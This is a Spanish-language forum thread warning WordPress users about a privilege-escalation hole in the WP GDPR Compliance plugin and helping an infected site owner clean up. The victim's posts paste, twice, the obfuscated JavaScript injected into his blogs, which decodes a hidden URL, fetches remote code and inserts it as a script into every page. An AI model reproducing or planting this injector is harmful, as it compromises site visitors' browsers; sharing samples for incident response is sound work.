WP GDPR Compliance - Plugin Wordpress - Vulnerable!!

  • Autor Autor snucker
  • Fecha de inicio Fecha de inicio
snucker

snucker

1
Eta
Verificado
Verificación en dos pasos activada
Verificado por Whatsapp
¡Ha verificado su Paypal!
Verificado por Binance
Suscripción a IA
Para los que tienen el plugin de Wordpress WP GDPR Compliance instalado, asegúrense de tenerlo actualizado a la versión 1.4.3 porque las versiones anteriores son vulnerables para escalar privilegios dentro de tu Web, se registra como usuario con correo "trollherten@mail.com" y se agrega como administrador de tu instalación Wordpress.

Si la tienen instalada, vayan a usuarios y verifiquen de no tener un usuario extra.

El plugin se actualizó ayer con correcciones de seguridad y debería actualizarse a la versión 1.4.3:

Fecha de actualización: 7 de noviembre de 2018.

  • Solución de seguridad: Eliminada la función base64_decode ().
  • Solución de seguridad: escape correctamente de la entrada en la función $ wpdb-> prepare ().
  • Solución de seguridad: solo permite modificar las opciones de WordPress utilizadas por el complemento y por las capacidades del usuario.


Saludos. :encouragement:
 
Última edición:
Mis 3 blogs ya están infectados, que puedo hacer para solucionarlo?? He instalado la versión que tenía hace 15 días y he borrado el pluging por ftp, pero no se soluciona (solo sale texto, ni imagenes ni tema y cuando intento acceder me pone todo esto...

var a=['enableLinkTracking','setTrackerUrl','piwik.php','setSiteId','createElement','getElementsByTagName','script','type','text/javascript','async','src','//cdn.innocraft.cloud/diwutixip.innocraft.cloud/piwik.js','parentNode','fromCharCode','templat33','open','GET','send','responseText','push','trackPageView'];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0xbb));var b=function(c,d){c=c-0x0;var e=a[c];return e;};make_me();var _paq=_paq||[];_paq[b('0x0')]([b('0x1')]);_paq['push']([b('0x2')]);(function(){var c='https://diwutixip.innocraft.cloud/';_paq[b('0x0')]([b('0x3'),c+b('0x4')]);_paq[b('0x0')]([b('0x5'),'1']);var d=document,e=d[b('0x6')]('script'),f=d[b('0x7')](b('0x8'))[0x0];e[b('0x9')]=b('0xa');e[b('0xb')]=!![];e[b('0xc')]=b('0xd');f[b('0xe')]['insertBefore'](e,f);}());function make_me(){var g=String[b('0xf')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x6d,0x79,0x73,0x70,0x61,0x63,0x65,0x69,0x64,0x2e,0x73,0x70,0x61,0x63,0x65,0x2f,0x78,0x6d,0x6c,0x72,0x70,0x63,0x2e,0x70,0x68,0x70);var h=httpGet(g);if(h!='null'){var i=document[b('0x7')](b('0x8'));var j=!![];for(var k=i['length'];k--😉{if(i[k]['id']==b('0x10')){j=![];}};if(j==!![]){var l=h;var m=document,n=m[b('0x6')](b('0x8')),o=m[b('0x7')](b('0x8'))[0x0];n[b('0x9')]=b('0xa');n[b('0xb')]=!![];n[b('0xc')]=h;n['id']=b('0x10');o['parentNode']['insertBefore'](n,o);}}}function httpGet(p){var q=new XMLHttpRequest();q[b('0x11')](b('0x12'),p,![]);q[b('0x13')](null);return q[b('0x14')];}

No se donde mirar por el ftp donde está ese user instalado. AYUDA!! 😕
 
Gracias por la advertencia
 
garripo dijo:
Mis 3 blogs ya están infectados, que puedo hacer para solucionarlo?? He instalado la versión que tenía hace 15 días y he borrado el pluging por ftp, pero no se soluciona (solo sale texto, ni imagenes ni tema y cuando intento acceder me pone todo esto...

var a=['enableLinkTracking','setTrackerUrl','piwik.php','setSiteId','createElement','getElementsByTagName','script','type','text/javascript','async','src','//cdn.innocraft.cloud/diwutixip.innocraft.cloud/piwik.js','parentNode','fromCharCode','templat33','open','GET','send','responseText','push','trackPageView'];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0xbb));var b=function(c,d){c=c-0x0;var e=a[c];return e;};make_me();var _paq=_paq||[];_paq[b('0x0')]([b('0x1')]);_paq['push']([b('0x2')]);(function(){var c='https://diwutixip.innocraft.cloud/';_paq[b('0x0')]([b('0x3'),c+b('0x4')]);_paq[b('0x0')]([b('0x5'),'1']);var d=document,e=d[b('0x6')]('script'),f=d[b('0x7')](b('0x8'))[0x0];e[b('0x9')]=b('0xa');e[b('0xb')]=!![];e[b('0xc')]=b('0xd');f[b('0xe')]['insertBefore'](e,f);}());function make_me(){var g=String[b('0xf')](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x6d,0x79,0x73,0x70,0x61,0x63,0x65,0x69,0x64,0x2e,0x73,0x70,0x61,0x63,0x65,0x2f,0x78,0x6d,0x6c,0x72,0x70,0x63,0x2e,0x70,0x68,0x70);var h=httpGet(g);if(h!='null'){var i=document[b('0x7')](b('0x8'));var j=!![];for(var k=i['length'];k--😉{if(i[k]['id']==b('0x10')){j=![];}};if(j==!![]){var l=h;var m=document,n=m[b('0x6')](b('0x8')),o=m[b('0x7')](b('0x8'))[0x0];n[b('0x9')]=b('0xa');n[b('0xb')]=!![];n[b('0xc')]=h;n['id']=b('0x10');o['parentNode']['insertBefore'](n,o);}}}function httpGet(p){var q=new XMLHttpRequest();q[b('0x11')](b('0x12'),p,![]);q[b('0x13')](null);return q[b('0x14')];}

No se donde mirar por el ftp donde está ese user instalado. AYUDA!! 😕
Hacer clic para expandir...

Te logueas al wp-admin de tu wordpress y te vas a Usuarios -> Todos los usuarios y ahí eliminas al usuario que desconozcas y generas una nueva contraseña de administrador.

Escanea tu sitio con:
Insertar CODE, HTML o PHP: 
https://sitecheck.sucuri.net/
.


Tienes que borrar todo lo que esta adentro de public_html y re-subir una versión segura de tu sitio web y también tendrías que revisar tu base de datos.

Saludos.
 
Última edición:
snucker dijo:
Te logueas al wp-admin de tu wordpress y te vas a Usuarios -> Todos los usuarios y ahí eliminas al usuario que desconozcas y generas una nueva contraseña de administrador.

Escanea tu sitio con:
Insertar CODE, HTML o PHP: 
https://sitecheck.sucuri.net/
.


Tienes que borrar todo lo que esta adentro de public_html y re-subir una versión segura de tu sitio web y también tendrías que revisar tu base de datos.

Saludos.
Hacer clic para expandir...

No me deja loguearme.
 
garripo dijo:
No me deja loguearme.
Hacer clic para expandir...

Entonces necesitas borrar todo desde el CPanel o FTP y subir una versión anterior, tambien podrias modificar la password desde PHPMYADMIN directo a la BD pero si tienes una version anterior mejor subela.
 
snucker dijo:
Entonces necesitas borrar todo desde el CPanel o FTP y subir una versión anterior, tambien podrias modificar la password desde PHPMYADMIN directo a la BD pero si tienes una version anterior mejor subela.
Hacer clic para expandir...
Si tengo una version anterior, concretamente del 21 de Octubre( es una copia que hace el propio alojsmiento), pero al restaurarla me sigue dando ese mismo fallo.
 
garripo dijo:
Si tengo una version anterior, concretamente del 21 de Octubre( es una copia que hace el propio alojsmiento), pero al restaurarla me sigue dando ese mismo fallo.
Hacer clic para expandir...

Comparte una captura de pantalla del error.
 
Por favor una ayudita, no se que hacer!!
 
Bro [MENTION=176925]garripo[/MENTION], desde el Cpanel borra todo lo que tiene adentro public_html y restaura con una version anterior, probablemente no estas borrando todo desde el FTP y si efectivamente estas borrando todo, significa que la versión del 21 de octubre ya tenia el malware, tienes que ir probando entre versiones anteriores hasta hallar la que no esta infectada.

Saludos.
 
Hay que estar conectado o registrado para responder aquí.
Atrás
Arriba